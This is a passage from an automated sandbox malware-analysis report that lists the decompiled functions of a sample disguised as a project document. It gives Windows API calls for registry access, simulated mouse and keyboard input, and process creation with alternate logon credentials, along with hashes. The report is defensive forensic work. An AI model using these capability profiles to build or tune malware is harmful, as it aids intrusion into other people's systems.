                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 007E9FBE
                                                        • __mtinitlocks.LIBCMT ref: 007E9AEB
                                                        • __mtterm.LIBCMT ref: 007E9AF4
                                                          • Part of subcall function 007E9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,007E9AF9,007E7CD0,0087A0B8,00000014), ref: 007E9C56
                                                          • Part of subcall function 007E9B5C: _free.LIBCMT ref: 007E9C5D
                                                          • Part of subcall function 007E9B5C: DeleteCriticalSection.KERNEL32(0087EC00,?,?,007E9AF9,007E7CD0,0087A0B8,00000014), ref: 007E9C7F
                                                        • __calloc_crt.LIBCMT ref: 007E9B19
                                                        • __initptd.LIBCMT ref: 007E9B3B
                                                        • GetCurrentThreadId.KERNEL32 ref: 007E9B42
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 3567560977-0
                                                        • Opcode ID: 3574d82826cd26ac8884ca96690eca380cbc032199294241c7ebd3b991ec7a2f
                                                        • Instruction ID: ee5b67030dc5cf571333b3d885360a0ac09a2dbb8d64eb32c02df7acd6fc9c5f
                                                        • Opcode Fuzzy Hash: 3574d82826cd26ac8884ca96690eca380cbc032199294241c7ebd3b991ec7a2f
                                                        • Instruction Fuzzy Hash: F1F0627361B791A9E774B6777C0B74A3691AF0A734B20462AF754C51D2FE2888418160
                                                        Function 007E406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007E3F85), ref: 007E4085
                                                        • GetProcAddress.KERNEL32(00000000), ref: 007E408C
                                                        • EncodePointer.KERNEL32(00000000), ref: 007E4097
                                                        • DecodePointer.KERNEL32(007E3F85), ref: 007E40B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 3489934621-2819208100
                                                        • Opcode ID: e8433be29839a9633005e204d4a7096dbe3e58a9e46dbaf1fd68f7e73df6a0b6
                                                        • Instruction ID: f760570e40ceac3734319a77d056eba9ad0f34a560c4773b9ddf74abebf73c34
                                                        • Opcode Fuzzy Hash: e8433be29839a9633005e204d4a7096dbe3e58a9e46dbaf1fd68f7e73df6a0b6
                                                        • Instruction Fuzzy Hash: 04E0B678581300EFEB20AF65EC0DB053AA5B706F42F10402AF611E12A1CFBA4604DB14
                                                        Function 008264B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                        • Instruction ID: 7bc4455bbacc749adf2ad829398fddeaa1e3908718058ddc1dccacbb47c8056c
                                                        • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                        • Instruction Fuzzy Hash: 70618C3050066ADBCF01EF64CC8AEBE37A5FF08308F04452DF9559B192EA78AC95CB90
                                                        Function 008401E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 00840E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0083FDAD,?,?), ref: 00840E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008402BD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008402FD
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00840320
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00840349
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0084038C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00840399
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: 813b258e6c8b2f609556156f772c41e060bd45a3e8acc3fcd8afefa6cc1893a3
                                                        • Instruction ID: f8179e967f05f703af42acc0975fcf24af0c2b4c3c6ef139d2fbf5cfa65393b3
                                                        • Opcode Fuzzy Hash: 813b258e6c8b2f609556156f772c41e060bd45a3e8acc3fcd8afefa6cc1893a3
                                                        • Instruction Fuzzy Hash: 5D514731208204EFC714EF64C889EABBBE9FF89314F04491DF685872A2DB75E944CB52
                                                        Function 00845799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 008457FB
                                                        • GetMenuItemCount.USER32(00000000), ref: 00845832
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0084585A
                                                        • GetMenuItemID.USER32(?,?), ref: 008458C9
                                                        • GetSubMenu.USER32(?,?), ref: 008458D7
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00845928
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: f4ba8e7c2af6a5585572af6f61f942b4ddb6aa29fca7e90a6bfdfa39abfba314
                                                        • Instruction ID: 868daa6100d303a7a1a0ed19d0f68067a9158bf335bc93510589b2a007745984
                                                        • Opcode Fuzzy Hash: f4ba8e7c2af6a5585572af6f61f942b4ddb6aa29fca7e90a6bfdfa39abfba314
                                                        • Instruction Fuzzy Hash: 38514935A00619EFCF11EF64C849AAEBBB4FF49320F104069E901EB352CB74AE41CB90
                                                        Function 0081EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0081EF06
                                                        • VariantClear.OLEAUT32(00000013), ref: 0081EF78
                                                        • VariantClear.OLEAUT32(00000000), ref: 0081EFD3
                                                        • _memmove.LIBCMT ref: 0081EFFD
                                                        • VariantClear.OLEAUT32(?), ref: 0081F04A
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0081F078
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 62bdb504d50d344545c240a1d3a4acc030386d115c048819d4a2f851d1906906
                                                        • Instruction ID: 786fb922877f48063ea8dc6b594d05f1fa426e9f0edb1e2b7d2e775ae843bfb1
                                                        • Opcode Fuzzy Hash: 62bdb504d50d344545c240a1d3a4acc030386d115c048819d4a2f851d1906906
                                                        • Instruction Fuzzy Hash: E2514CB5A00209DFDB14CF58C884AAAB7F8FF4C314B158569EE59DB302E735E951CBA0
                                                        Function 0082220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00822258
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008222A3
                                                        • IsMenu.USER32(00000000), ref: 008222C3
                                                        • CreatePopupMenu.USER32 ref: 008222F7
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00822355
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00822386
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: 6cfbf49fc4db774bc2cf9c0211a25fdbadbc89a8ea32295dfcd4b5b7aa31f3f5
                                                        • Instruction ID: e999e20a4032e32091e8814313ecb29007b2aa12a5b85d7432890b76670c4ca3
                                                        • Opcode Fuzzy Hash: 6cfbf49fc4db774bc2cf9c0211a25fdbadbc89a8ea32295dfcd4b5b7aa31f3f5
                                                        • Instruction Fuzzy Hash: 57517B70600269FBDF21CF68E988BAEBBE5FF45318F104169E811D72A1D3799984CB51
                                                        Function 007C1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 007C179A
                                                        • GetWindowRect.USER32(?,?), ref: 007C17FE
                                                        • ScreenToClient.USER32(?,?), ref: 007C181B
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007C182C
                                                        • EndPaint.USER32(?,?), ref: 007C1876
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                        • String ID:
                                                        • API String ID: 1827037458-0
                                                        • Opcode ID: b9c405e81976a06735b547bb3fe87fd80e6bd03138587684f195e2698cce9933
                                                        • Instruction ID: 75cb381f0da7eba8f811f57f1321e17cf8d4603392786c0250c60236f8ef08d5
                                                        • Opcode Fuzzy Hash: b9c405e81976a06735b547bb3fe87fd80e6bd03138587684f195e2698cce9933
                                                        • Instruction Fuzzy Hash: 17416B74504600AFD711DF28C888FBA7BE8FB46734F14467DFAA4862A2C7349845DB62
                                                        Function 0084B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(008857B0,00000000,00ED5230,?,?,008857B0,?,0084B5A8,?,?), ref: 0084B712
                                                        • EnableWindow.USER32(00000000,00000000), ref: 0084B736
                                                        • ShowWindow.USER32(008857B0,00000000,00ED5230,?,?,008857B0,?,0084B5A8,?,?), ref: 0084B796
                                                        • ShowWindow.USER32(00000000,00000004,?,0084B5A8,?,?), ref: 0084B7A8
                                                        • EnableWindow.USER32(00000000,00000001), ref: 0084B7CC
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0084B7EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 8ad250dd4c7be1270ad939c4720179fc0c723c09dcb896ba2ffc72e890a976a2
                                                        • Instruction ID: 194fdad3f456fac035575a1f5340d81156f3058bd5652b717e48fd300cac0aa7
                                                        • Opcode Fuzzy Hash: 8ad250dd4c7be1270ad939c4720179fc0c723c09dcb896ba2ffc72e890a976a2
                                                        • Instruction Fuzzy Hash: 36413E34601248AFDB26CF28C599B957BE1FF45314F1881BAFA48CF6A2C731E856CB51
                                                        Function 0083709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00834E41,?,?,00000000,00000001), ref: 008370AC
                                                          • Part of subcall function 008339A0: GetWindowRect.USER32(?,?), ref: 008339B3
                                                        • GetDesktopWindow.USER32 ref: 008370D6
                                                        • GetWindowRect.USER32(00000000), ref: 008370DD
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0083710F
                                                          • Part of subcall function 00825244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008252BC
                                                        • GetCursorPos.USER32(?), ref: 0083713B
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00837199
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: f451f74f1a0f80320e8f7b360f5f04cc5ed32e3ad3725861033c915fa57fa4a7
                                                        • Instruction ID: 7de44da942e24475bac082148653d795697dedcf41974c22609101c2b0779234
                                                        • Opcode Fuzzy Hash: f451f74f1a0f80320e8f7b360f5f04cc5ed32e3ad3725861033c915fa57fa4a7
                                                        • Instruction Fuzzy Hash: C231CF72509305ABD720DF14D849F9FBBAAFBC9314F000929F985D7192DA34EA09CBD2
                                                        Function 00818879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 008180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008180C0
                                                          • Part of subcall function 008180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008180CA
                                                          • Part of subcall function 008180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008180D9
                                                          • Part of subcall function 008180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008180E0
                                                          • Part of subcall function 008180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008180F6
                                                        • GetLengthSid.ADVAPI32(?,00000000,0081842F), ref: 008188CA
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008188D6
                                                        • HeapAlloc.KERNEL32(00000000), ref: 008188DD
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 008188F6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0081842F), ref: 0081890A
                                                        • HeapFree.KERNEL32(00000000), ref: 00818911
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: 3b76935bf2bf3b077e7acfe53a94955518254a28cebbb0d14608571228879b97
                                                        • Instruction ID: 351e4ee03cc76519c7ce715bce50172dbb049290275b45668d0ff4ef99fbab10
                                                        • Opcode Fuzzy Hash: 3b76935bf2bf3b077e7acfe53a94955518254a28cebbb0d14608571228879b97
                                                        • Instruction Fuzzy Hash: 9C118935601609EBDB119BA4DC0ABFE7BACFF85315F108068E985D7211CB32A980DB60
                                                        Function 008185B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008185E2
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 008185E9
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008185F8
                                                        • CloseHandle.KERNEL32(00000004), ref: 00818603
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00818632
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00818646
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 193610a47cfa7d3409df55bae6ac91aec33b3d69fdde24a300fc683ee8d7d10c
                                                        • Instruction ID: 07d9f6bf30ef825b6c3358944497b70ccd29fec277ae6fafda91ae4fda130f76
                                                        • Opcode Fuzzy Hash: 193610a47cfa7d3409df55bae6ac91aec33b3d69fdde24a300fc683ee8d7d10c
                                                        • Instruction Fuzzy Hash: DE114776500249EBDF118FA4DD49BDA7BADFF49354F044069FE04A2161C7768DA0EB60
                                                        Function 0081B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0081B7B5
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0081B7C6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0081B7CD
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0081B7D5
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0081B7EC
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0081B7FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 23fb97b9f2b93043fc01a63faf397ce761fc44a434ab3bc6471cc7e9734874f2
                                                        • Instruction ID: 52726c70c8c78dd70c3bd633e6e9420a29076a82e974868465366d2a68a8653a
                                                        • Opcode Fuzzy Hash: 23fb97b9f2b93043fc01a63faf397ce761fc44a434ab3bc6471cc7e9734874f2
                                                        • Instruction Fuzzy Hash: 34017175A00219BBEB109BB69C45A5ABFB8FF49351F044069FA08E7291D6309C00CF91
                                                        Function 007E0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007E0193
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 007E019B
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007E01A6
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007E01B1
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 007E01B9
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007E01C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: 37d9b42932e0d62a9bd7b7bebd28ab7ccc9fdd3432beda5aee4dd64a391d5265
                                                        • Instruction ID: 2f6d9706d5c31c21b260094e0edcacb092bce62a9e093d1ca6d1665eb477b3d3
                                                        • Opcode Fuzzy Hash: 37d9b42932e0d62a9bd7b7bebd28ab7ccc9fdd3432beda5aee4dd64a391d5265
                                                        • Instruction Fuzzy Hash: E7016CB09027597DE3008F5A8C85B52FFA8FF19354F00411FA15C47942C7F5A868CBE5
                                                        Function 008253E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008253F9
